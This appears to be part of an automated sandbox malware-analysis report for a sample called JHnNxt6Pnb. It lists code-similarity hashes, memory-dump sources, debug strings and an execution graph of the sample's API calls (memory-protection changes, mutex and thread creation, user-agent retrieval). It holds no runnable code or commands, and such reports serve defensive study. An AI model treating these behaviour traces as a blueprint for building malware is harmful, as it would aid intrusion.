                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 931254f76593f2c1a2c48ebde32cb4adea26308ce41a2f0a5a61a9e8170011ec
                                                                                                                              • Instruction ID: 6d765c3ed6f2456f44b377fab7e961ff7bc88ab14169747e29b86f880ea7ce68
                                                                                                                              • Opcode Fuzzy Hash: 931254f76593f2c1a2c48ebde32cb4adea26308ce41a2f0a5a61a9e8170011ec
                                                                                                                              • Instruction Fuzzy Hash: 6BF0E2715916919FE322971CC148B55BBE8AB847B0F08BC25D52A8751FC260E880CA54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                              • Instruction ID: af4d9903a7640f3cc7b8cdd135b86ef02b73f274848cca7cea1e2c3d3fa2be4a
                                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                              • Instruction Fuzzy Hash: 16E092723006112BE7219E5D8D84F577B6EDFD2B10F05007AB6045E251C9E69C1982A4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                              • Instruction ID: 841af2418be7ef3dd1f9d6bf7afd38a944d798593b6d21b11063a0f38addaf8e
                                                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                              • Instruction Fuzzy Hash: 1CF08C72100604AFF3228F09DC44B92BBB8EB05364F06C029E6089B560D339EC41CBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                              • Instruction ID: 9865202cab0a6deb2eb5b57355c6661a34e5e87950c5540e6a832544fa9fd4da
                                                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                              • Instruction Fuzzy Hash: 52F0E539304345DBDF17CF1AC450AA57BE4FB81350B040455F84A8B342D776EA82CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                              • Instruction ID: 77aeac360d9b11b503e45cc098cb69d706fa73949139feaa89774ec8bb85d40e
                                                                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                              • Instruction Fuzzy Hash: 64E0DF37244285AFD3212F5D8800B6A7FAAEBD87A0F1B0429E244CB258DB70DC40C7E8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                              • Instruction ID: aaf61e3f277ca7392d16c2efd263d4e14e5e3a55afe48235c1931c77ccd48af9
                                                                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                              • Instruction Fuzzy Hash: EFE0DF32A00110BBEB21AB998E05F9ABEACDB94FA0F050054B608E70E0E530EE00C6D0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 6fe58ab427b671ed77a3f32044271d6eb00fec66f1f8905c54f735d103144191
                                                                                                                              • Instruction ID: b4f145f9c3b14a028b093e64192b46b994d73397aa70fa8ec2f9b2c87dad1dca
                                                                                                                              • Opcode Fuzzy Hash: 6fe58ab427b671ed77a3f32044271d6eb00fec66f1f8905c54f735d103144191
                                                                                                                              • Instruction Fuzzy Hash: B3E09232100954ABC722BF29DD05F9A77DAEBA4760F014519F11957190CA34A910C784
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                              • Instruction ID: 9e732e157ba79caee0da7b5454b93960365d2e693c6616b9b8842b7c1984ec13
                                                                                                                              • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                              • Instruction Fuzzy Hash: 22E09231010612DFEF326F2AD908B527AE0BF90721F148C2EE19A024B1C77498C0CA40
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                              • Instruction ID: c9d49f1664c1cf6f51dc3bbe9191604897ec8d3ebcd0ca60e2f6b6255fc2f176
                                                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                              • Instruction Fuzzy Hash: EDE0C2343003168FE715CF19C040B627BBABFD9A20F29C068A9488F305EB36E842CB40
Memory Dump Source
• Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5582fae134d6297e600747d5c34705544d139883d56a19fec24480b5087df594
• Instruction ID: 7517476f6bc05733407f907106427a49856b4d1bbda0f19ccce0d3bce6ca9612
• Opcode Fuzzy Hash: 5582fae134d6297e600747d5c34705544d139883d56a19fec24480b5087df594
• Instruction Fuzzy Hash: AAC09B3691B10515E5141D4DF4402F4F37AD753679F40329BD905A75015553D4550389
                                                                                                                              • Instruction Fuzzy Hash: 61B01232212645CFC7036760CB08B1832A9BF157C0F0900F0650089870D6288910E501
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 06df720567649793fb839410f39740a2e8af79caa1113fce1945fb1be6e09961
                                                                                                                              • Instruction ID: 6f37d030d8e2e86f7f758ff262802249e17fd2890f0ea6cef890d1614890ada8
                                                                                                                              • Opcode Fuzzy Hash: 06df720567649793fb839410f39740a2e8af79caa1113fce1945fb1be6e09961
                                                                                                                              • Instruction Fuzzy Hash: 66900231A05800129140715848846464015A7E0301F56C111F0428554CCA188A576361
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 817ce887b32ebf12b2de2d4507c49e340f00cdc1a86ba5359466b2863a5030eb
                                                                                                                              • Instruction ID: d203372be54a9ac45152350f02bdda4233443d484508936f23f76e9680b90936
                                                                                                                              • Opcode Fuzzy Hash: 817ce887b32ebf12b2de2d4507c49e340f00cdc1a86ba5359466b2863a5030eb
                                                                                                                              • Instruction Fuzzy Hash: 5A900261A01500424140715848045066015A7E1301796C215B0558560CC61C8956A369
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3a95edea1d381ae03ebac81f155f4ee2bd0b65a7e76e03c96b2566062d923305
                                                                                                                              • Instruction ID: 285d5b57163b01213c120d054dfb6a16954ceca3afb8f919ca4d1a32f2becaec
                                                                                                                              • Opcode Fuzzy Hash: 3a95edea1d381ae03ebac81f155f4ee2bd0b65a7e76e03c96b2566062d923305
                                                                                                                              • Instruction Fuzzy Hash: 05900231A0540802D15071584414746001597D0301F56C111B0028654DC7598B5677A1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0a471afdf89a4d99237ff8f72f8e41d88efe1b05e7ce28daf452e33000f4e2c3
                                                                                                                              • Instruction ID: 4186bd438fddf47b96633ad78ecef55b8b1bdd42de7b9f2f8b8bc783dbfec33d
                                                                                                                              • Opcode Fuzzy Hash: 0a471afdf89a4d99237ff8f72f8e41d88efe1b05e7ce28daf452e33000f4e2c3
                                                                                                                              • Instruction Fuzzy Hash: 8090023160140802D10471584804786001597D0301F56C111B6028655ED66989927231
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fd22c2d902706356dfe5dfbb5d9b47021656e6dda93fa550efc99906410081b3
                                                                                                                              • Instruction ID: 002b4eb777569dc3ea852d02abadc5b8aabcb63a20aaa584835c4a9a34311eef
                                                                                                                              • Opcode Fuzzy Hash: fd22c2d902706356dfe5dfbb5d9b47021656e6dda93fa550efc99906410081b3
                                                                                                                              • Instruction Fuzzy Hash: 9190023160544842D14071584404B46002597D0305F56C111B0068694DD6298E56B761
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0f09ff62da48918c1abc02013bcb203c2a76947996bfcf7f63f185e4f90d1a29
                                                                                                                              • Instruction ID: cba12eb8d832064e1bd0cb5793a00f76086d906a90dad781caa3dfdb1d3826cd
                                                                                                                              • Opcode Fuzzy Hash: 0f09ff62da48918c1abc02013bcb203c2a76947996bfcf7f63f185e4f90d1a29
                                                                                                                              • Instruction Fuzzy Hash: C99002A1601540924500B2588404B0A451597E0201F56C116F1058560CC5298952A235
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3a4e006aae7525326c120084e32a2b2ded464aaf23875e8dd2187bec64cbb5af
                                                                                                                              • Instruction ID: 2e724267d4f3b52931b17a45a47e0f538b366b327f2ce9098836cb8f53afb8c1
                                                                                                                              • Opcode Fuzzy Hash: 3a4e006aae7525326c120084e32a2b2ded464aaf23875e8dd2187bec64cbb5af
                                                                                                                              • Instruction Fuzzy Hash: 88900225621400020145B558060460B0455A7D6351796C115F141A590CC62589666321
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 57f3a10b79bbc68451c95ac9316b2474f8e30648cecd790c11e740395e226363
                                                                                                                              • Instruction ID: 7cecd0cde09121ea00695b4ff1a82d0f8739523dc655a09e1de0f4a5ae41cd9c
                                                                                                                              • Opcode Fuzzy Hash: 57f3a10b79bbc68451c95ac9316b2474f8e30648cecd790c11e740395e226363
                                                                                                                              • Instruction Fuzzy Hash: 1490023164140402D141715844047060019A7D0241F96C112B0428554EC6598B57BB61
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2f22b0ebb9eac295eee3939b5d8d68341b6241141a20f69141c8795e210918ea
                                                                                                                              • Instruction ID: 6a826da617231a136ae85b5f9a4004b0a12d90a6e751da490647c988e232a464
                                                                                                                              • Opcode Fuzzy Hash: 2f22b0ebb9eac295eee3939b5d8d68341b6241141a20f69141c8795e210918ea
                                                                                                                              • Instruction Fuzzy Hash: 8990022160544442D10075585408B06001597D0205F56D111B1068595DC6398952B231
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4c2a7eec1e7a8b9fbc4072e27c621e8b23ac68e97da20b977d10223d7d910ca2
                                                                                                                              • Instruction ID: 385fccf26379af753eaef4ad7160893a55d28e6655dca80d0ae2c7fb5f75c1c2
                                                                                                                              • Opcode Fuzzy Hash: 4c2a7eec1e7a8b9fbc4072e27c621e8b23ac68e97da20b977d10223d7d910ca2
                                                                                                                              • Instruction Fuzzy Hash: 4290023160140403D10071585508707001597D0201F56D511B0428558DD65A89527221
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5f8f77148b80534aaf6f3b4d70c70b18f755c0e3ff1b61512f8c9849abe91bcd
                                                                                                                              • Instruction ID: 1fb22ca625991737077971289b5d788e69434292512b004bdb0f6da70db11180
                                                                                                                              • Opcode Fuzzy Hash: 5f8f77148b80534aaf6f3b4d70c70b18f755c0e3ff1b61512f8c9849abe91bcd
                                                                                                                              • Instruction Fuzzy Hash: BE900221A0540402D14071585418706002597D0201F56D111B0028554DC65D8B5677A1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2cf3d5c79e0b6a4601833691ca0259181ee193dee239df025aeee2ead1328f8e
                                                                                                                              • Instruction ID: 672a6156369efcf2e96d0c3b31a3c704d4548e90126b809d826f253be8fb006e
                                                                                                                              • Opcode Fuzzy Hash: 2cf3d5c79e0b6a4601833691ca0259181ee193dee239df025aeee2ead1328f8e
                                                                                                                              • Instruction Fuzzy Hash: 8790023160140842D10071584404B46001597E0301F56C116B0128654DC619C9527621
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 10d9369fd9ab193d321fe3c48d2ae509b0b1caf0fba18f58847f64989e752204
                                                                                                                              • Instruction ID: eb9a30871a0db67691e327825cebd751fa91bbb24a23e7d6dd38a6701b6f091b
                                                                                                                              • Opcode Fuzzy Hash: 10d9369fd9ab193d321fe3c48d2ae509b0b1caf0fba18f58847f64989e752204
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                              • API String ID: 0-2474120054
                                                                                                                              • Opcode ID: 613d2e2bfd1a93f8269dea05624fa15ac52551f085b063bd0fd998f4181910ca
                                                                                                                              • Instruction ID: 5015f535675ba876511c17fea9017ca436a171922b8356b04b66b0713948f34d
                                                                                                                              • Opcode Fuzzy Hash: 613d2e2bfd1a93f8269dea05624fa15ac52551f085b063bd0fd998f4181910ca
                                                                                                                              • Instruction Fuzzy Hash: 13E1BF706087429FD726CF28D984B2ABBE0BF84724F180A1DF9A5DB2E1D774D945CB42
Strings
• RTL: Re-Waiting, xrefs: 01A57BAC
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A57B7F
• RTL: Resource at %p, xrefs: 01A57B8E
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
• Opcode ID: cb6e5dec69e1738c523877b4ffd841602254babb6b2d9a421e9c0915d18b457d
• Instruction ID: e4897291fc53a4f56247f85904fe3c6581e7486526a51920e2978a25662fd743
• Opcode Fuzzy Hash: cb6e5dec69e1738c523877b4ffd841602254babb6b2d9a421e9c0915d18b457d
• Instruction Fuzzy Hash: 9A41D1317057029FD724DF29D940B6AB7F6EF98720F100A1DF95AEB690DB31E8058BA1
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A5728C
Strings
• RTL: Re-Waiting, xrefs: 01A572C1
• RTL: Resource at %p, xrefs: 01A572A3
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A57294
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
• Opcode ID: 59764f010eca5c650976c31d01c2af4a1c4a16f2db3ce252aad600e8d3a88494
• Instruction ID: b489672357395eb8de39a103302df1d7c1471e6fd944bb71b5cadf90afdc1190
• Opcode Fuzzy Hash: 59764f010eca5c650976c31d01c2af4a1c4a16f2db3ce252aad600e8d3a88494
• Instruction Fuzzy Hash: 06410031744202AFC720CF6ACC41B6ABBB5FB98750F144619FD55EB281DB31E8028BE1
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: 038176fc7cde7e10c8d4fa12af5fba39e7c2662be990fd46971b7ebdb1d3c6f9
• Instruction ID: 6e365a1516011dd4eb355f1800b62eca0aefa1209352ddb0c1066284aeaee67c
• Opcode Fuzzy Hash: 038176fc7cde7e10c8d4fa12af5fba39e7c2662be990fd46971b7ebdb1d3c6f9
• Instruction Fuzzy Hash: 94318676A00619AFDF20DF2DDD40BEF77F8EB54610F44455AE949E3240EB309A448BA0
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
• Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction ID: d9169070a3625b9e75bfc46ed2c920488a4e2d5347d37ab1d6acaa8e928a51b0
• Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction Fuzzy Hash: E291C471E042369BEB24DFADC881ABEBBB5FF64320F14451AE955E72C0D7349A40CB61
Strings
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: 3cd4f904a95608ca2d9d0d3aed2ade506a3b2f8849f63df6af092e88c40faf6c
• Instruction ID: 51aeb877277b1048c1c36fe62723bf87b73e5d6b131ad4c6061c7ea57d4b52c5
• Opcode Fuzzy Hash: 3cd4f904a95608ca2d9d0d3aed2ade506a3b2f8849f63df6af092e88c40faf6c
• Instruction Fuzzy Hash: C5810C75D002699BDB32CB54DD44BEAB7B8AB48754F0041DAEA1DB7280D7709E85CFA0
APIs
• @_EH4_CallFilterFunc@8.LIBCMT ref: 01A6CFBD
Strings
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID: CallFilterFunc@8
• String ID: @$@4Qw@4Qw
• API String ID: 4062629308-2383119779
• Opcode ID: 581ca99ca79b3790f265f3b3c25911640a067bee7aa16e7bb774b92dda67ffdd
• Instruction ID: 2274a3964507609115032b7b4b4625d853e613837aac013293c2bff4c5fd4872
• Opcode Fuzzy Hash: 581ca99ca79b3790f265f3b3c25911640a067bee7aa16e7bb774b92dda67ffdd
• Instruction Fuzzy Hash: 3141E2B5E00619EFCB219FD9C940A6DBBB8FF54B50F01442EEA46DB254D774C901CB61

Execution Graph

Execution Coverage: 1.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 11.4%
Total number of Nodes: 79
Total number of Limit Nodes: 9
execution_graph 20204 115d22dd 20208 115d231a 20204->20208 20205 115d23fa 20206 115d2328 SleepEx 20206->20206 20206->20208 20208->20205 20208->20206 20211 115dcf12 7 API calls 20208->20211 20212 115d3432 NtCreateFile 20208->20212 20213 115d20f2 6 API calls 20208->20213 20211->20208 20212->20208 20213->20208 20214 115debac 20215 115debb1 20214->20215 20248 115debb6 20215->20248 20249 115d4b72 20215->20249 20217 115dec2c 20218 115dec85 20217->20218 20219 115dec69 20217->20219 20220 115dec54 20217->20220 20217->20248 20263 115dcab2 NtProtectVirtualMemory 20218->20263 20224 115dec6e 20219->20224 20225 115dec80 20219->20225 20259 115dcab2 NtProtectVirtualMemory 20220->20259 20222 115dec8d 20264 115d6102 ObtainUserAgentString NtProtectVirtualMemory 20222->20264 20261 115dcab2 NtProtectVirtualMemory 20224->20261 20225->20218 20229 115dec97 20225->20229 20227 115dec5c 20260 115d5ee2 ObtainUserAgentString NtProtectVirtualMemory 20227->20260 20230 115dec9c 20229->20230 20231 115decbe 20229->20231 20253 115dcab2 NtProtectVirtualMemory 20230->20253 20235 115decd9 20231->20235 20236 115decc7 20231->20236 20231->20248 20233 115dec76 20262 115d5fc2 ObtainUserAgentString NtProtectVirtualMemory 20233->20262 20235->20248 20267 115dcab2 NtProtectVirtualMemory 20235->20267 20265 115dcab2 NtProtectVirtualMemory 20236->20265 20239 115deccf 20266 115d62f2 ObtainUserAgentString NtProtectVirtualMemory 20239->20266 20241 115decac 20254 115d5de2 ObtainUserAgentString 20241->20254 20243 115dece5 20268 115d6712 ObtainUserAgentString NtProtectVirtualMemory 20243->20268 20246 115decb4 20255 115d2412 20246->20255 20250 115d4b93 20249->20250 20251 115d4cb5 CreateMutexExW 20250->20251 20252 115d4cce 20250->20252 20251->20252 20252->20217 20253->20241 20254->20246 20256 115d2440 20255->20256 20257 115d2473 20256->20257 20258 115d244d CreateThread 20256->20258 20257->20248 20258->20248 20259->20227 20260->20248 20261->20233 20262->20248 20263->20222 20264->20248 20265->20239 20266->20248 20267->20243 20268->20248 20269 115dee12 20273 115dd942 20269->20273 20271 115dee45 NtProtectVirtualMemory 